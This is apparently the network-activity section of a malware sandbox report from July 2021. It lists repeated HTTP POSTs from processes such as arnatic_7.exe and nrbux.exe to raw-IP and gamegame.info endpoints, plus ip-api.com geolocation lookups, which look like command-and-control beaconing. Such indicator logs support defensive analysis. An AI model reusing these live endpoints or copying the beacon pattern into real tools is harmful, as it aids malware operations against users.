                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861a675c0e7251-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:09 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aefe0300001649e0bff000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=EYTcFf%2BmmFlHJM3V2D%2B6hjaLu%2FyYE6zdOTDhyuoOlXQwgCu1VAKYqbnj3UbbSKXyXdQJAtnpiMlrtG7%2BEoNxyuJfyMNWXDrO0Q3MXpTO6S9rcoYcIkDRrZwdo9n4vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861aa99c8b1649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:29 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:19 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07af267f00004151ff958000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mgYtFf9DLghj5Jh%2Bw1tjHxqvxO1S0OTW3VsyFelUlWttj9iDMsLgS8j5tufWZYjitBRBrgHV4qxNOyV5Vz8%2FC2spCOjCHIeS0bKpV%2F1KwiSic3EfAQh8x0rHtneS0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861aea6bd54151-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:29 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07af4ef600001649af1ec000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Lkx2iR6ONDJwGjx8DgC2t7hVzY0p02QVVVkwqG7HHyaiBEMSsobLd75zSUILNWVbx%2BuzzpubZkAqmXTsdoi1l0gjSitkRLjeBvY8VXWTb%2FzdI7WfgF0EiC3Khgtgeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861b2b293c1649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07af76ec0000fa78cb27e000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BA87z6UQXV6AWJcrdvZ%2FAut9JCelKjE%2FZBPlO0FjDCe5H5Hg7Pczqn2rcr6iVNI06Kl2TktQhjHLXzmJ5ycY%2B4FPSHOGjnLIszLZkDEAPQTFswhnK%2FfhIzKteYAnLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861b6b1c9efa78-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        self.events.data.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        self.events.data.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        self.events.data.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        self-events-data.trafficmanager.net
                                                                                                                                                                                        self-events-data.trafficmanager.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        skypedataprdcolcus11.cloudapp.net
                                                                                                                                                                                        skypedataprdcolcus11.cloudapp.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        52.114.128.74
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07af9ef20000f41b3428f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XPRPdF0SF7uUDD6bLQAzg4K7RLH2q9G%2FBM8xKAQFg6B9ZVaU4iaSTQhy01aDdTAxPD8BD1ykATCwq6uknMNZBmiS5gAaEWhknMdbjg%2Fe9JGM8M4MjgeMWyOSYjUy0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861bab1ed4f41b-LHR
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:00 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07afc73300000b6125124000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2KpmG370NPTVSXp62hmwBkGfUt32q5A2zBNbPx7EgBMWAiZDa%2Bywa%2BHKYMFreCQeDT0LfckMx3wa6C4gjmiMZS4y0EzF%2F%2BunwCDuS4GIDfCCgkb0tSXVTNuyh1AFCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861beb88530b61-OSL
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:10 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07afefa5000062383f094000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=PRqvwgp%2BGnADGCq67r%2B25hXRYe1GwliPqADCHFMtf1SyAwidvpwWsLYfNBStwyuycMXl26mqVHYsGgNxe%2FRxmiZOl4bKO3s%2BNUlAfEep2SI8kRJW6teKuXIVUqrOkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861c2c3d1a6238-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:21 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b0184e0000164996924000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=f9p6QtgXWmII6%2FwFT1%2F4InfS8EEIE%2BcyIgDKtr2PAIJpR7BqJxKhDQLVyxkbHnKE3PPowgRcPY5sw1lZ7eAtQLDVr6NU55hQ2bufLpODG%2BI5CoF2nMxdrmmMX%2BkuWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861c6d49551649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:40 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/?fields=8198 HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:31 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 58
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 27
                                                                                                                                                                                        X-Rl: 39
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/?fields=8198 HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:32 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 58
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 26
                                                                                                                                                                                        X-Rl: 34
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.200.215
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.21.221
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.200.215
